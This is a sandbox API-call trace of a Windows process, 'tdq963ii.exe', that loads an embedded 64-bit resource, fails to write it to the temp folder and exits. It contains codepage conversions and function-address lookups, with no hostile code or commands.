\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0187.772] GetLastError () returned 0x0 [0187.772] SetLastError (dwErrCode=0x0) [0187.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0187.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0187.772] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0187.772] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0187.772] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ/Æ\x84\x06äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0187.772] GetLastError () returned 0x0 [0187.772] SetLastError (dwErrCode=0x0) [0187.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0187.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0187.772] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0187.772] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0187.772] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ/Æ\x84\x06äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0187.773] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x80) returned 0x5a9250 [0187.788] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0187.788] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0187.789] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a9250) returned 0x80 [0187.789] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0187.789] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0187.789] GetCurrentProcess () returned 0xffffffff [0187.789] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0187.789] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0187.790] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0187.792] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0187.792] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0187.792] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0187.792] LockResource (hResData=0x43c648) returned 0x43c648 [0187.792] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5a9720 [0187.793] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.891] GetLastError () returned 0x20 [0187.891] GetLastError () returned 0x20 [0187.908] SetLastError (dwErrCode=0x20) [0187.908] GetLastError () returned 0x20 [0187.908] SetLastError (dwErrCode=0x20) [0187.908] GetLastError () returned 0x20 [0187.909] SetLastError (dwErrCode=0x20) [0187.910] GetLastError () returned 0x20 [0187.910] SetLastError (dwErrCode=0x20) [0187.911] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x5a9740 [0187.911] GetLastError () returned 0x20 [0187.911] SetLastError (dwErrCode=0x20) [0187.911] GetLastError () returned 0x20 [0187.912] SetLastError (dwErrCode=0x20) [0187.912] GetLastError () returned 0x20 [0187.912] SetLastError (dwErrCode=0x20) [0187.912] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0187.913] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0188.165] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8820 | out: hHeap=0x590000) returned 1 [0188.166] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0188.166] ExitProcess (uExitCode=0x1) [0188.167] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a70b8 | out: hHeap=0x590000) returned 1 Process: id = "178" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2fab2000" os_pid = "0xb38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0xb10" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 708 os_tid = 0xa70 [0184.511] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0184.511] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0184.511] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0184.512] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0184.512] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0184.512] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0184.512] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0184.512] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0184.513] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0184.513] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0184.513] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0184.513] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0184.513] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0184.514] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0184.514] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0184.514] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0184.514] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0184.514] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0185.124] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0185.124] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0185.124] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0185.124] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0185.125] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0185.126] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0185.127] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0185.128] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0185.129] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0185.130] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0185.131] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0185.132] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0185.132] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0185.132] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0185.132] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0185.132] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0185.132] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0185.132] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0185.132] 